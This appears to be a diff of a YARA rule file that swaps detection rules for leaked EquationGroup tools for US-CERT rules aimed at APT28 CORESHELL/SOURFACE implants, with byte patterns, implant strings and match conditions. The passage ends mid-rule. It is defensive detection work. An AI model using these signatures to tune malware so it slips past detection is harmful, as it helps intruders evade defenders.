+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L173-L186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3eedb6abb09989784a7dc5e721f9901e936f2c0241967b48858e5e5897b9f24a"
-		score = 75
+		logic_hash = "93ce725a8af03d6f08eafe99ff3984e03a434b1f0071c6dbe560bafc3eefb576"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a649ca8da7b5499821a768c650a397216cdc95d826862bf30fcc4725ce8587f"
 
 	strings:
-		$s1 = "Win32_Process" fullword ascii
-		$s2 = "\\\\%ls\\root\\cimv2" fullword wide
-		$op1 = { 83 7b 18 01 75 12 83 63 }
+		$STR1 = { e8 [2] ff ff 8b [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F
+         ?? [1-2] 00 01 00 00 7F ?? [1-2] 80 00 00 00 7F ?? 83 ?? 40 7F}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_DS_Parselogs : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V7 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1906c0fc-3fbc-5995-8789-f1c02e574672"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "839041d9-e27b-52a2-b5d5-f1af595826f4"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2347-L2362"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L188-L208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4c35476b512378d1e3c7e7e3e9dae16adb0d4de4ecab143d034110836c11d0d"
-		score = 75
+		logic_hash = "dd65443065f044a2956ae51140423dab202effff5f12dd686f6c4fd54d8a4a0b"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0228691d63038b072cdbf50782990d505507757efbfa87655bb2182cf6375956"
 
 	strings:
-		$x1 = "* Size (%d) of remaining capture file is too small to contain a valid header" fullword wide
-		$x2 = "* Capture header not found at start of buffer" fullword wide
-		$x3 = "Usage: %ws <capture_file> <results_prefix>" fullword wide
+		$s1 = {10 A0 FA FD 83 3D 28 D4 1F FF 77 5? ?8 B4 50 CC 1E B0 78 D7 90 13
+         21 C0 23 3D 28 BC 78 95 DE 4B B0 60 00 00 0F 7F 38 B4 50 C8 D5 9F E0
+         25 DF F3 21 C0 28 BC 13 3D 2B 90 60 00 00 0F 7F 18 B4 50 C8 BC F2 21
+         C0 28 B4 5E 48 B5 5E 00 8D 41 FE 83 F8 06 8B 45 ?? 72 ?? 8B 4D ?? 8B }
+		$s2 = {28 D9 B0 00 00 00 00 FB 65 C0 AF E8 D3 40 28 B4 5? ?0 3C 20 FA FD
+         88 D7 A0 18 D4 2F F3 3D 2F 77 5? ?C 1E B0 78 BC 73 21 C0 A3 3D 2B 90
+         60 00 00 0F 7F 18 A4 D? ?8 B4 50 C8 0E 90 20 24 D? ?3 20 C0 28 B4 5?
+         ?3 3D 2F 77 5? ?8 B4 50 C2 20 C0 28 BD 70 2D 93 01 E8 B4 D0 C8 D4 2F
+         E3 B4 5E 88 B4 5? ?8 95 5? ?7 2A 05 F5 E5 B8 BE 55 DC 20 80 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Oracle_Implant : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V9 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6ff4cd21-1060-5901-842e-c04bde4f16ec"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "41f46b52-4b0e-53ee-a86c-503fe9a9532c"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2364-L2379"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L210-L236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "568a5d103527e6fd99bbac8d49a2d667f464fd16d5bf276f98c88c39e129b58b"
-		score = 75
+		logic_hash = "5947dbb08c9d0851b7993e5ccf177f97dcb330d4b390833843f69932c921ce7a"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8e9be4960c62ed7f210ce08f291e410ce0929cd3a86fe70315d7222e3df4587e"
 
 	strings:
-		$op0 = { fe ff ff ff 48 89 9c 24 80 21 00 00 48 89 ac 24 }
-		$op1 = { e9 34 11 00 00 b8 3e 01 00 00 e9 2a 11 00 00 b8 }
-		$op2 = { 48 8b ca e8 bf 84 00 00 4c 8b e0 8d 34 00 44 8d }
+		$STR1 = { 8A C3 02 C0 02 D8 8B 45 F8 02 DB 83 C1 02 03 45 08 88 5D 0F 89
+         45 E8 8B FF 0F B6 5C 0E FE 8B 45 F8 03 C1 0F AF D8 8D 51 01 89 55 F4
+         33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 F4 C1 EB 07 32 1C 32 33 D2
+         F7 F7 8A C1 02 45 0F 2C 02 32 04 32 33 D2 88 45 FF 8B C1 8B F7 F7 F6
+         8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE
+         3B D7 72 A4 8B 45 E4 8B 7D E0 8B 5D F0 83 45 F8 06 43 89 5D F0 3B D8
+         0F 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10 03 C0 2B F8 EB 09 33
+         C9 E9 5B FF FF FF 33 FF 3B 7D EC 0F 83 ?? ?? ?? ?? 8B 55 08 8A CB 02
+         C9 8D 04 19 02 C0 88 45 13 8D 04 5B 03 C0 8D 54 10 FE 89 45 E0 8D 4F
+         02 89 55 E4 EB 09 8D 9B 00 00 00 00 8B 45 E0 0F B6 5C 31 FE 8D 44 01
+         FE 0F AF D8 8D 51 01 89 55 0C 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B
+         45 0C C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 13 2C 02 32 04 32 33
+         D2 88 45 0B 8B C1 8B F7 F7 F6 8A 45 0B 8B 75 14 22 04 32 02 D8 8B 45
+         E4 30 1C 01 8B 4D 0C }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dmgz_Target : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V10 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "182a2488-ac3f-5dc6-aa61-d6d267574d10"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "cb88ae0c-19e2-590c-9c13-78ac1dcc8c9f"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2381-L2395"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L238-L251"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ae3e0c30c9dbee311d4e5576b1a447ac57f8b1786dc5753246ad3c08ccecb85"
-		score = 75
+		logic_hash = "62d47c1076b05bc9a531ef6e48f17f730932826b4b0f311887e3b14c639b937d"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5964966041f93d5d0fb63ce4a85cf9f7a73845065e10519b0947d4a065fdbdf2"
 
 	strings:
-		$s1 = "\\\\.\\%ls" fullword ascii
-		$s3 = "6\"6<6C6H6M6Z6f6t6" fullword ascii
+		$STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8]
+         48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setresourcename : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V11 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dc261147-3b52-57c3-9729-2645a0999a99"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "570d6996-ab16-556e-b790-e4c73d7bbffc"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2397-L2413"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L253-L267"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e26aac30e06da14060a955761d08e6f543db2f2747be2959b0090f60e6eb52a5"
-		score = 75
+		logic_hash = "72b9e4de0389df3a14f92660e91749dea4d31905eb7391163c3503bc953d661f"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "537793d5158aecd0debae25416450bd885725adfc8ca53b0577a3df4b0222e2e"
 
 	strings:
-		$x1 = "Updates the name of the dll or executable in the resource file" fullword ascii
-		$x2 = "*NOTE: SetResourceName does not work with PeddleCheap versions" fullword ascii
-		$x3 = "2 = [appinit.dll] level4 dll" fullword ascii
-		$x4 = "1 = [spcss32.exe] level3 exe" fullword ascii
+		$STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53
+         56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68
+         [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5A4D ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Drivers_Implant : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V14 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "727a0a8c-0019-53e9-9632-c610299305fc"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "1e4958e7-e136-5600-bc16-36cdeeb3ea18"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2415-L2431"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L269-L293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "45190a317f3d293dbc3015873080d1253bfb3298008f5dea69ab1a5780a70721"
-		score = 75
+		logic_hash = "4abb1e1c68ced667f04a69c58c89187f9ccc0633c5dc5f396ba8d210bf405f93"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee8b048f1c6ba821d92c15d614c2d937c32aeda7b7ea0943fd4f640b57b1c1ab"
 
 	strings:
-		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
-		$s2 = "hZwLoadDriver" fullword ascii
-		$op1 = { b0 01 e8 58 04 00 00 c3 33 }
+		$STR1 = {8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89
+         74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D
+         04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76
+         4C 89 6C 24  }
+		$STR2 = {C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D
+         04 ?? 46 0F B6 0C ?? 40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7
+         E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48
+         FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 }
+		$STR3 = {41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04
+         1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1
+         C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA }
+		$STR4 = {46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03
+         C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 41 0F AF CB C1 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+		( uint16( 0 ) == 0x5A4D ) and any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Shares_Target : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V15 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "51245be4-6d24-57e4-8c92-c8c1ae5e3cf9"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "9bdaebc1-86a0-5c21-b752-d69cdb70f082"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2433-L2449"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L295-L310"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "11a1af97d720286a7fadf8b056f8f7add70acb041a828441166f5c74bc7a819d"
-		score = 75
+		logic_hash = "fac61e80803941193c41ecf8b3fcbee21b5cc41542989ecd93542c32e87da983"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6c57fb33c5e7d2dee415ae6168c9c3e0decca41ffe023ff13056ff37609235cb"
 
 	strings:
-		$s1 = "Select * from Win32_Share" fullword ascii
-		$s2 = "slocalhost" fullword wide
-		$s3 = "\\\\%ls\\root\\cimv2" fullword wide
-		$s4 = "\\\\%ls\\%ls" fullword ascii
+		$XOR_LOOP1 = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 }
+		$XOR_LOOP2 = { 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 }
+		$XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ntfltmgr : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V16 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "402b14f5-4a7a-58fb-8f4a-0a29d6d34440"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "2c54a749-c80b-5010-97b6-b74c54fd3d07"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2451-L2475"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L312-L329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9f280baf785f54218cbf47f65419cfe23c687e58021f36b5d116904d2cec9a9b"
-		score = 75
+		logic_hash = "638cb66e5ff52ac5a1df0954969e7c54a3b25518228e4f8f344aafe6760985d2"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3df61b8ef42a995b8f15a0d38bc51f2f08f8d9a2afa1afc94c6f80671cf4a124"
-		hash2 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
-		hash3 = "980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43"
 
 	strings:
-		$s3 = "wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOw" fullword ascii
-		$s6 = "w+w;w2w0w6w4w.w(wRw" fullword ascii
-		$op1 = { 80 f7 ff ff 49 89 84 34 18 02 00 00 41 83 a4 34 }
-		$op2 = { ff 15 0b 34 00 00 eb 92 }
-		$op3 = { 4d 8d b4 34 08 02 00 00 4d 85 f6 0f 84 ae }
-		$op4 = { 8b ca 2b ce 8d 34 01 0f b7 3e 66 3b 7d f0 89 75 }
-		$op5 = { 8a 40 01 00 c7 47 70 }
-		$op6 = { e9 3c ff ff ff 6a ff 8d 45 f0 50 e8 27 11 00 00 }
-		$op7 = { 8b 45 08 53 57 8b 7d 0c c7 40 34 }
+		$OBF_FUNCT = { 0F B6 1C 0B 8D 34 08 8D 04 0A 0F AF D8 33 D2 8D 41 FF F7
+         75 F8 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06
+         00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06
+         00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06
+         8B 5D F0 8D 41 FE 83 F8 06 8B 45 DC 72 9A }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and $OBF_FUNCT
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_BH : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V17 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "dc3a6b08-1ac4-5fa2-a710-657514d45606"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2477-L2492"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L331-L347"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "273e38e287b1597753f653c0ed8300936581a1b767029d3f0ba757de589bcd5a"
-		score = 75
+		logic_hash = "ea2793e6ce9e9d97e70a9452a38eb4d5ddbcc275af6ae7f5d094dc77e112d278"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f"
 
 	strings:
-		$op0 = { 44 89 20 e9 40 ff ff ff 8b c2 48 8b 5c 24 60 48 }
-		$op1 = { 45 33 c9 49 8d 7f 2c 41 ba }
-		$op2 = { 89 44 24 34 eb 17 4c 8d 44 24 28 8b 54 24 30 48 }
+		$STR1 = { 24108b44241c894424148b4424246836 }
+		$STR2 = { 518d4ddc516a018bd08b4de4e8360400 }
+		$STR3 = { e48178061591df75740433f6eb1a8b48 }
+		$STR4 = { 33d2f775f88b45d402d903c641321c3a }
+		$STR5 = { 006a0056ffd083f8ff74646a008d45f8 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		( uint16( 0 ) == 0x5A4D ) and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_LP : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V18 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c3f8f0f9-80ab-5d8e-be42-59b90dc291cb"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "5376ec57-f405-55cf-a23b-aafb1cb800e5"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2494-L2508"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L349-L376"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cd7b92f13e0a00d23baef70e38b476b62394106dfa70e831786f398c573aa744"
-		score = 75
+		logic_hash = "d982b3b1407e140f586772ce409e47bd29e567af41e466cd94d0983c93aab917"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3a505c39acd48a258f4ab7902629e5e2efa8a2120a4148511fe3256c37967296"
 
 	strings:
-		$s1 = "* Failed to get connection information.  Aborting launcher!" fullword wide
-		$s2 = "Format: <command> <target port> [lp port]" fullword wide
+		$STR1 = { 8A C1 02 C0 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 0C 88 5D FF
+         8B 5D EC 83 C2 FE 03 D8 89 55 E0 89 5D DC 8D 49 00 03 C1 8D 34 0B 0F
+         B6 1C 0A 0F AF D8 33 D2 8D 41 FF F7 75 F4 8B 45 0C C1 EB 07 8D 79 01
+         32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE
+         02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22
+         1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45
+         F8 72 9B 8B 4D F0 8B 5D D8 8B 7D 08 8B F0 41 83 C6 06 89 4D F0 89 75
+         F8 3B 4D D4 0F 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 C0 2B
+         F8 EB 02 33 FF 3B FA 0F 83 ?? ?? ?? ?? 8B 5D EC 8A C1 02 C0 83 C3 FE
+         8D 14 08 8D 04 49 02 D2 03 C0 88 55 0B 8D 48 FE 8D 57 02 03 C3 89 4D
+         D4 8B 4D 0C 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00 00 0F B6 5C 0A FE
+         8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1
+         EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80
+         E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B
+         D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remotecommand_Lp : FILE
+rule SIGNATURE_BASE_IMPLANT_2_V19 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "98ace4d7-edd0-5e84-bac8-b69e5307f567"
-		date = "2017-04-15"
+		description = "CORESHELL/SOURFACE Implant by APT28"
+		author = "US CERT"
+		id = "b4efdb3c-d7d6-5141-ad73-90d70582f8bd"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2510-L2524"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L378-L404"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "974772264324e7721f51a88534aaa3b4eb1d409e04f673783caf4849d90522de"
-		score = 75
+		logic_hash = "42bee6ddf0b13774efb6712135c3e0b4eae6364120f8973272820f5f669671d1"
+		score = 85
 		quality = 85
